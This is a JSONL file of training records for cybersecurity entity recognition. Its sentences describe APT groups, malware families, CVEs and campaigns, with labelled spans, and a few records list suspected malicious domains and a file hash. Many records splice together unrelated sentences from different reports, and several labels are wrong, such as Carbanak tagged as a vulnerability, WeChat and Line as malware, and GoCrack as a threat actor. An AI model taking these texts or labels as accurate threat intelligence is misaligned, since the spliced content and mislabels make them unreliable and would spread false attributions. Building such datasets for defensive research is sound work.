{"text": "Port 6208 : IMO extraction service . Symantec detects this threat as Backdoor.Nidiran . Meetings minutes of different Palestinian organizations . Request a demo meeting with us or reach out to us at salesthreatconnect.com to see how we can help automate phishing analysis and response for your organization .", "spans": {"SYSTEM: IMO": [[12, 15]], "ORGANIZATION: Symantec": [[37, 45]], "MALWARE: Backdoor.Nidiran": [[69, 85]], "ORGANIZATION: salesthreatconnect.com": [[199, 221]]}, "info": {"id": "cyberner_stix_train_007003", "source": "cyberner_stix_train"}}
{"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s . The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": {"THREAT_ACTOR: Poseidon": [[0, 8]], "TOOL: emails": [[135, 141]]}, "info": {"id": "cyberner_stix_train_007004", "source": "cyberner_stix_train"}}
{"text": "Taking this information from directory listings , like the one shown above , allowed for the decryption of all content . Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 . advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com . Unfortunately , the CSP policy ca n’t discriminate based on the Tag ID .", "spans": {"TOOL: Infy": [[121, 125]], "ORGANIZATION: development agencies": [[297, 317]], "DOMAIN: advanbusiness.com": [[399, 416]], "DOMAIN: businessconsults.net": [[417, 437]], "DOMAIN: businessformars.com": [[438, 457]], "DOMAIN: companyinfosite.com": [[458, 477]], "DOMAIN: conferencesinfo.com": [[478, 497]], "DOMAIN: copporationnews.com": [[498, 517]], "SYSTEM: CSP": [[540, 543]]}, "info": {"id": "cyberner_stix_train_007005", "source": "cyberner_stix_train"}}
{"text": "Locky distribution ceased in June and July but returned in August with volumes rivaling the peaks of 2016 .", "spans": {"MALWARE: Locky": [[0, 5]]}, "info": {"id": "cyberner_stix_train_007006", "source": "cyberner_stix_train"}}
{"text": "We decided to call the operation “ ViceLeaker ” , because of strings and variables in its code . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"MALWARE: ViceLeaker": [[35, 45]], "ORGANIZATION: Booz Allen Hamilton": [[97, 116]], "ORGANIZATION: AhnLab": [[129, 135]], "THREAT_ACTOR: Bisonal malware": [[249, 264]], "MALWARE: Bisonal": [[333, 340]], "TOOL: downloader": [[490, 500]], "TOOL: C2": [[557, 559]]}, "info": {"id": "cyberner_stix_train_007007", "source": "cyberner_stix_train"}}
{"text": "All the domains in both batches were initially registered with the same alias : “ John Kasai of Klagenfurt , Austria ” .", "spans": {}, "info": {"id": "cyberner_stix_train_007008", "source": "cyberner_stix_train"}}
{"text": "User clicks link to attacker controlled website .", "spans": {}, "info": {"id": "cyberner_stix_train_007009", "source": "cyberner_stix_train"}}
{"text": "A BREXIT-themed lure document that delivers ZEKAPAB malware .", "spans": {"MALWARE: ZEKAPAB": [[44, 51]]}, "info": {"id": "cyberner_stix_train_007010", "source": "cyberner_stix_train"}}
{"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"TOOL: Linux.GreedyAntd": [[22, 38]], "TOOL: Word": [[271, 275]], "ORGANIZATION: social engineering campaigns": [[342, 370]], "ORGANIZATION: women 's rights activists": [[379, 404]]}, "info": {"id": "cyberner_stix_train_007011", "source": "cyberner_stix_train"}}
{"text": "Our analysis shows that the threat actor behind the FakeSpy malware is a Chinese-speaking group , commonly referred to as \" Roaming Mantis '' , a group that is known to have launched similar campaigns in the past . The samples we analyzed originated from the Philippines . These VNC exectuables would either be included in the SFX file or downloaded by the batch script .", "spans": {"MALWARE: FakeSpy": [[52, 59]], "ORGANIZATION: Roaming Mantis": [[124, 138]], "MALWARE: samples": [[219, 226]], "MALWARE: VNC": [[279, 282]]}, "info": {"id": "cyberner_stix_train_007012", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "FILEPATH: China Chopper": [[142, 155]], "VULNERABILITY: exploit": [[217, 224], [248, 255]], "SYSTEM: Windows": [[260, 267]], "VULNERABILITY: CVE-2015-0062": [[284, 297]], "VULNERABILITY: CVE-2015-1701": [[300, 313]], "VULNERABILITY: CVE-2016-0099": [[318, 331]], "THREAT_ACTOR: attacker": [[345, 353]]}, "info": {"id": "cyberner_stix_train_007013", "source": "cyberner_stix_train"}}
{"text": "This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . The exploit installs Silence’s loader , designed to download backdoors and other malicious programs .", "spans": {"MALWARE: module": [[5, 11]], "VULNERABILITY: exploit": [[149, 156]], "THREAT_ACTOR: Silence’s": [[166, 175]]}, "info": {"id": "cyberner_stix_train_007014", "source": "cyberner_stix_train"}}
{"text": "including the functionality to steal passwords , take screenshots , log keystrokes , and steal files .", "spans": {}, "info": {"id": "cyberner_stix_train_007015", "source": "cyberner_stix_train"}}
{"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection . DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information . Lastly , the command supplies a file named “ s1.txt ” in the \" pack\\scil\\ \" folder of the attacker 's ISO .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[117, 128]], "TOOL: RATs": [[269, 273]], "TOOL: staging malware": [[278, 293]], "THREAT_ACTOR: Lazarus Group": [[311, 324]], "MALWARE: DarkComet": [[341, 350]], "MALWARE: Backdoor.Breut": [[353, 367]]}, "info": {"id": "cyberner_stix_train_007017", "source": "cyberner_stix_train"}}
{"text": "While they still use RAR SFX format for the initial payloads , ZeroT now uses a the legitimate McAfee utility ( SHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe ) named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past .", "spans": {"TOOL: RAR": [[21, 24]], "TOOL: SFX": [[25, 28]], "MALWARE: ZeroT": [[63, 68]], "ORGANIZATION: McAfee": [[95, 101]], "FILEPATH: 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe": [[119, 183]], "FILEPATH: mcut.exe": [[192, 200]], "ORGANIZATION: Norman Safeground AS": [[216, 236]]}, "info": {"id": "cyberner_stix_train_007018", "source": "cyberner_stix_train"}}
{"text": "This application is freely available from poisonivy-rat.com .", "spans": {"DOMAIN: poisonivy-rat.com": [[42, 59]]}, "info": {"id": "cyberner_stix_train_007019", "source": "cyberner_stix_train"}}
{"text": "GolfSpy encrypts all the stolen data using a simple XOR operation with a pre-configured key before sending it to the C & C server using the HTTP POST method . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them . The third module allows the operators to take a screenshot of the remote system . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": {"MALWARE: GolfSpy": [[0, 7]]}, "info": {"id": "cyberner_stix_train_007020", "source": "cyberner_stix_train"}}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Dokument 09.06.2017.docx .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "FILEPATH: Dokument 09.06.2017.docx": [[221, 245]]}, "info": {"id": "cyberner_stix_train_007021", "source": "cyberner_stix_train"}}
{"text": "The entered data is forwarded to the cybercriminals . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": {"ORGANIZATION: FireEye’s": [[54, 63]], "THREAT_ACTOR: APT28": [[98, 103]], "ORGANIZATION: Russian government": [[129, 147]]}, "info": {"id": "cyberner_stix_train_007022", "source": "cyberner_stix_train"}}
{"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts ’ reputations . Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device . The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we ’ve deciphered the functionality . These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time .", "spans": {"TOOL: Win32/Barlaiy": [[132, 145]], "TOOL: Win32/PlugX.L": [[148, 161]], "THREAT_ACTOR: Barium": [[206, 212]], "TOOL: Google Translate": [[411, 427]]}, "info": {"id": "cyberner_stix_train_007023", "source": "cyberner_stix_train"}}
{"text": "The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "TOOL: DealersChoice": [[47, 60]], "TOOL: Flash": [[82, 87]]}, "info": {"id": "cyberner_stix_train_007024", "source": "cyberner_stix_train"}}
{"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the ACT for later potential ICS events .", "spans": {"ORGANIZATION: Microsoft": [[146, 155]], "THREAT_ACTOR: Barium": [[207, 213]], "MALWARE: Win32/ShadowPad.A": [[252, 269]], "MALWARE: ICS": [[318, 321], [519, 522]], "THREAT_ACTOR: RASPITE": [[335, 342]], "ORGANIZATION: IT": [[469, 471]]}, "info": {"id": "cyberner_stix_train_007025", "source": "cyberner_stix_train"}}
{"text": "Our research on the RTM malware shows that the Russian banking system is still a target of choice for criminals . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": {"TOOL: RTM malware": [[20, 31]], "THREAT_ACTOR: criminals": [[102, 111]], "ORGANIZATION: army officials": [[145, 159]], "MALWARE: WeChat": [[211, 217]], "MALWARE: SmeshApp": [[220, 228]], "MALWARE: Line": [[235, 239]], "ORGANIZATION: army personnel": [[340, 354]]}, "info": {"id": "cyberner_stix_train_007026", "source": "cyberner_stix_train"}}
{"text": "In addition to “ Free VPN Master Android , ” we ’ ve observed Red Alert 2.0 Trojans in the wild disguising themselves using names like : Flash Player or Update Flash Player Android Update or Android Antivirus Chrome Update or Google Update Update Google Market WhatsApp Viber OneCoin Wallet Pornhub Tactic FlashLight or PROFlashLight Finanzonline The vast majority of in-the-wild Red Alert 2.0 samples falsely present themselves as Adobe Flash player for Android , a utility that Adobe stopped supporting years ago . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday . The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS . They will usually have found your email address via a data breach of a third party .", "spans": {"SYSTEM: Free VPN Master Android": [[17, 40]], "MALWARE: Red Alert 2.0": [[62, 75]], "SYSTEM: Flash Player": [[137, 149]], "SYSTEM: Update Flash Player": [[153, 172]], "SYSTEM: Android Update": [[173, 187]], "SYSTEM: Android Antivirus": [[191, 208]], "SYSTEM: Chrome Update": [[209, 222]], "SYSTEM: Google Update": [[226, 239]], "SYSTEM: Update Google Market": [[240, 260]], "SYSTEM: WhatsApp": [[261, 269]], "SYSTEM: Viber": [[270, 275]], "SYSTEM: OneCoin": [[276, 283]], "SYSTEM: Wallet": [[284, 290]], "MALWARE: Red Alert 2.0 samples": [[380, 401]], "SYSTEM: Adobe Flash player": [[432, 450]], "SYSTEM: Android": [[455, 462]], "ORGANIZATION: Adobe": [[480, 485]], "TOOL: APT37 malware": [[542, 555]], "TOOL: BITS": [[712, 716]], "SYSTEM: Windows XP": [[745, 755]], "SYSTEM: Windows 10": [[774, 784]], "VULNERABILITY: data breach of a third party": [[924, 952]]}, "info": {"id": "cyberner_stix_train_007027", "source": "cyberner_stix_train"}}
{"text": "Despite the group's proficiency , there are still many opportunities to detect and disrupt its operation by studying its modus operandi .", "spans": {}, "info": {"id": "cyberner_stix_train_007028", "source": "cyberner_stix_train"}}
{"text": "In the actual targeted attack detected by the Hungarian National Security Agency , TeamSpy used components of the TeamViewer tool combined with other malware modules . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"TOOL: TeamViewer tool": [[114, 129]], "TOOL: malware modules": [[150, 165]], "TOOL: emails": [[175, 181]], "ORGANIZATION: government officials": [[196, 216]], "FILEPATH: malicious Microsoft Word document": [[258, 291]], "VULNERABILITY: CVE-2012-0158": [[311, 324]]}, "info": {"id": "cyberner_stix_train_007029", "source": "cyberner_stix_train"}}
{"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]], "ORGANIZATION: Novetta’s": [[42, 51]], "FILEPATH: Silence.Main Trojan": [[104, 123]]}, "info": {"id": "cyberner_stix_train_007030", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups . It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR.exe . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": {"TOOL: PlugX tool": [[213, 223]], "FILEPATH: CLR.exe": [[378, 385]], "TOOL: LIGHTWORK": [[402, 411]]}, "info": {"id": "cyberner_stix_train_007031", "source": "cyberner_stix_train"}}
{"text": "This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations .", "spans": {"THREAT_ACTOR: Sednit": [[45, 51]]}, "info": {"id": "cyberner_stix_train_007032", "source": "cyberner_stix_train"}}
{"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . The developers of Bookworm use these modules in a rather unique ACT , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": {"MALWARE: Bookworm": [[138, 146]], "MALWARE: Leader": [[243, 249]]}, "info": {"id": "cyberner_stix_train_007033", "source": "cyberner_stix_train"}}
{"text": "They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected . ALLANITE operations continue and intelligence indicates activity since at least May 2017 . A host firewall Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"TOOL: Foxit PDF reader": [[253, 269]], "TOOL: Foxit PDF Reader": [[309, 325]], "TOOL: PDF readers": [[353, 364]], "ORGANIZATION: Adobe Acrobat": [[415, 428]]}, "info": {"id": "cyberner_stix_train_007034", "source": "cyberner_stix_train"}}
{"text": "Cannon moves the downloaded file to the specified path .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_007035", "source": "cyberner_stix_train"}}
{"text": "The payload turned out to be an open source penetration test toolkit called Koadic .", "spans": {}, "info": {"id": "cyberner_stix_train_007036", "source": "cyberner_stix_train"}}
{"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below . RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and MiamiBeach” serve as the first beacon messages from the victim to the control server . APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": {"MALWARE: RocketMan!”": [[97, 108]], "MALWARE: MiamiBeach”": [[179, 190]], "THREAT_ACTOR: APT1": [[266, 270]]}, "info": {"id": "cyberner_stix_train_007037", "source": "cyberner_stix_train"}}
{"text": "Coverage Additional ways our customers can detect and block this threat are listed below . The Machete group sends very specific emails directly to its victims , and these change from target to target . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: Machete": [[95, 102]], "THREAT_ACTOR: APT38": [[223, 228]], "MALWARE: NESTEGG": [[238, 245]], "MALWARE: KEYLIME": [[265, 272]], "MALWARE: keylogger": [[277, 286]], "ORGANIZATION: bank": [[376, 380]]}, "info": {"id": "cyberner_stix_train_007038", "source": "cyberner_stix_train"}}
{"text": "2015 , APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"THREAT_ACTOR: APT28": [[7, 12]], "TOOL: emails": [[82, 88]]}, "info": {"id": "cyberner_stix_train_007039", "source": "cyberner_stix_train"}}
{"text": "Tools such as PlugX have historically been leveraged by threat groups operating in the PRC .", "spans": {"MALWARE: PlugX": [[14, 19]], "ORGANIZATION: PRC": [[87, 90]]}, "info": {"id": "cyberner_stix_train_007040", "source": "cyberner_stix_train"}}
{"text": "This particular HenBox variant , as listed in Table 3 above , harvests data from two popular messaging and social media apps : Voxer Walkie Talkie Messenger ( com.rebelvox.voxer ) and Tencent ’ s WeChat ( com.tencent.mm ) . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": {"MALWARE: HenBox": [[16, 22]], "SYSTEM: Voxer": [[127, 132]], "SYSTEM: Walkie Talkie": [[133, 146]], "SYSTEM: Messenger": [[147, 156]], "ORGANIZATION: Tencent": [[184, 191]], "SYSTEM: WeChat": [[196, 202]], "THREAT_ACTOR: APT41": [[224, 229]], "TOOL: HIGHNOON": [[350, 358]], "TOOL: HOMEUNIX": [[361, 369]], "TOOL: PHOTO": [[372, 377]], "TOOL: SOGU": [[380, 384]], "TOOL: ZXSHELL": [[391, 398]], "THREAT_ACTOR: Sofacy group": [[449, 461]], "MALWARE: Trojan": [[518, 524]], "MALWARE: Cannon": [[532, 538]]}, "info": {"id": "cyberner_stix_train_007042", "source": "cyberner_stix_train"}}
{"text": "Thanks to a relative lack of security controls applied to mobile devices , these devices have become very attractive targets for a broad range of malicious actors . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": {"ORGANIZATION: ESET": [[178, 182]], "MALWARE: Okrum": [[195, 200]], "THREAT_ACTOR: Lazarus Group": [[343, 356]], "ORGANIZATION: North Korean government": [[407, 430]]}, "info": {"id": "cyberner_stix_train_007043", "source": "cyberner_stix_train"}}
{"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up . The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT , the vast majority of the time they use what appear to be their own custom backdoors . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": {"ORGANIZATION: NQ Mobile Security": [[53, 71]], "SYSTEM: Android": [[117, 124]], "ORGANIZATION: diplomats": [[289, 298]], "ORGANIZATION: military attachés": [[301, 318]], "ORGANIZATION: private assistants": [[321, 339]], "ORGANIZATION: secretaries": [[342, 353]], "ORGANIZATION: Prime Ministers": [[357, 372]], "ORGANIZATION: journalists": [[375, 386]], "THREAT_ACTOR: APT1": [[464, 468]], "MALWARE: Poison Ivy": [[533, 543]], "MALWARE: Gh0st RAT": [[548, 557]], "ORGANIZATION: Researchers": [[646, 657]], "ORGANIZATION: online video game companies": [[731, 758]]}, "info": {"id": "cyberner_stix_train_007044", "source": "cyberner_stix_train"}}
{"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched .", "spans": {"MALWARE: InstallUtiil.exe": [[56, 72]], "MALWARE: Tor": [[94, 97]], "MALWARE: anonymizer": [[98, 108]], "THREAT_ACTOR: PROMETHIUM": [[111, 121]], "THREAT_ACTOR: NEODYMIUM": [[126, 135]], "VULNERABILITY: exploit": [[149, 156]], "VULNERABILITY: CVE-2016-4117": [[161, 174]], "TOOL: Flash": [[202, 207]]}, "info": {"id": "cyberner_stix_train_007045", "source": "cyberner_stix_train"}}
{"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": {"TOOL: NetTraveler": [[34, 45]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "TOOL: NetTraveler Trojan": [[96, 114]], "ORGANIZATION: businesses": [[145, 155]]}, "info": {"id": "cyberner_stix_train_007046", "source": "cyberner_stix_train"}}
{"text": "Industrial safety systems are highly redundant and separate controls which override and manage industrial processes if they approach unsafe conditions such as over-pressurization , overspeed , or over-heating .", "spans": {}, "info": {"id": "cyberner_stix_train_007047", "source": "cyberner_stix_train"}}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]]}, "info": {"id": "cyberner_stix_train_007048", "source": "cyberner_stix_train"}}
{"text": "Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": {"THREAT_ACTOR: GoCrack": [[47, 54]], "ORGANIZATION: additional users": [[188, 204]], "FILEPATH: malicious Word documents": [[240, 264]], "VULNERABILITY: exploit": [[281, 288]], "SYSTEM: Windows": [[293, 300]], "TOOL: OLE Automation Array Remote Code Execution": [[301, 343]], "VULNERABILITY: Vulnerability": [[344, 357]], "VULNERABILITY: CVE-2014-6332": [[369, 382]]}, "info": {"id": "cyberner_stix_train_007049", "source": "cyberner_stix_train"}}
{"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]], "ORGANIZATION: banks": [[146, 151], [163, 168]], "THREAT_ACTOR: PROMETHIUM": [[222, 232]], "THREAT_ACTOR: NEODYMIUM": [[237, 246]], "ORGANIZATION: specific individuals": [[291, 311]]}, "info": {"id": "cyberner_stix_train_007050", "source": "cyberner_stix_train"}}
{"text": "Figure 5 . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea . To do that , it also drops a PowerShell script on the workstation to execute . • Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": {"ORGANIZATION: diplomatic agency": [[37, 54], [82, 99]], "TOOL: PowerShell": [[146, 156]], "THREAT_ACTOR: Bad actors": [[198, 208]]}, "info": {"id": "cyberner_stix_train_007051", "source": "cyberner_stix_train"}}
{"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown . Carbanak is a threat group that mainly targets banks .", "spans": {"THREAT_ACTOR: Buckeye": [[93, 100]], "TOOL: Equation Group tools": [[110, 130]], "THREAT_ACTOR: Carbanak": [[198, 206]]}, "info": {"id": "cyberner_stix_train_007052", "source": "cyberner_stix_train"}}
{"text": "They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector .", "spans": {}, "info": {"id": "cyberner_stix_train_007053", "source": "cyberner_stix_train"}}
{"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[90, 120]], "VULNERABILITY: CVE-2017-11882": [[123, 137]], "TOOL: DLL": [[167, 170], [226, 229]], "FILEPATH: hpqhvsei.dll": [[177, 189]], "FILEPATH: hpqhvind.exe": [[240, 252]], "THREAT_ACTOR: threat actor": [[312, 324]], "THREAT_ACTOR: Winnti": [[334, 340]], "THREAT_ACTOR: the group": [[407, 416]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[531, 589]]}, "info": {"id": "cyberner_stix_train_007054", "source": "cyberner_stix_train"}}
{"text": "Two of these campaigns were detailed in separate blog posts by the Polish security company Prevenity , who said that both campaigns targeted Polish entities with spear- phishing emails containing malicious attachments with relevant Polish language names .", "spans": {"ORGANIZATION: Prevenity": [[91, 100]], "TOOL: emails": [[178, 184]]}, "info": {"id": "cyberner_stix_train_007055", "source": "cyberner_stix_train"}}
{"text": "It is however still only an iteration on earlier versions of the MiniDuke loader .", "spans": {"MALWARE: MiniDuke": [[65, 73]]}, "info": {"id": "cyberner_stix_train_007056", "source": "cyberner_stix_train"}}
{"text": "The user visits the URL to complete the payment and enters their phone number . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . Ps Process service Unix command implementation . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"ORGANIZATION: businesses": [[108, 118]], "SYSTEM: Unix": [[274, 278]], "TOOL: MOVEit": [[348, 354]]}, "info": {"id": "cyberner_stix_train_007057", "source": "cyberner_stix_train"}}
{"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"ORGANIZATION: FireEye": [[45, 52]], "MALWARE: BADRABBIT": [[89, 98]], "TOOL: BACKSWING": [[166, 175]], "MALWARE: custom dropper": [[231, 245]], "FILEPATH: MagicHound.DropIt": [[273, 290]]}, "info": {"id": "cyberner_stix_train_007058", "source": "cyberner_stix_train"}}
{"text": "The one non-random string difference was the path to the “ .txt ” and “ .exe ” files within the command “ certutil -decode ” , as the Sofacy document used “ C:\\Programdata\\ ” for the path whereas the Luckystrike document used the path stored in the Application.UserLibraryPath environment variable .", "spans": {"FILEPATH: .txt": [[59, 63]], "FILEPATH: .exe": [[72, 76]], "THREAT_ACTOR: Sofacy": [[134, 140]], "TOOL: Luckystrike": [[200, 211]], "FILEPATH: Application.UserLibraryPath": [[249, 276]]}, "info": {"id": "cyberner_stix_train_007059", "source": "cyberner_stix_train"}}
{"text": "During the May 2014 Ukrainian presidential election , purported pro-Russian hacktivists CyberBerkut conducted a series of malicious activities against the CEC including a system compromise , data destruction , a data leak , a distributed denial-of-service ( DDoS ) attack , and an attempted defacement of the CEC website with fake election results .", "spans": {"THREAT_ACTOR: CyberBerkut": [[88, 99]], "ORGANIZATION: CEC": [[155, 158], [309, 312]]}, "info": {"id": "cyberner_stix_train_007060", "source": "cyberner_stix_train"}}
{"text": "The ‘ onload2 ’ function decrypts the response received from the HTTP request issued in ‘ onload1 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_007061", "source": "cyberner_stix_train"}}
{"text": "The class “ org.starsizew.Tb ” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered . Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 . Finally , the malware will write the “ IndexOffice.txt ” file in the “ %APPDATA%\\Microsoft\\Office\\ ” path . In early 2020 , new versions of Foudre a malware associated with the APT Advanced Persistent Threat Infy discussed in detail below emerged with new and improved elements from previous versions .", "spans": {"ORGANIZATION: defense industry": [[235, 251]], "FILEPATH: IndexOffice.txt": [[401, 415]], "MALWARE: Foudre": [[499, 505]], "MALWARE: malware": [[508, 515]], "THREAT_ACTOR: APT Advanced Persistent Threat Infy": [[536, 571]]}, "info": {"id": "cyberner_stix_train_007062", "source": "cyberner_stix_train"}}
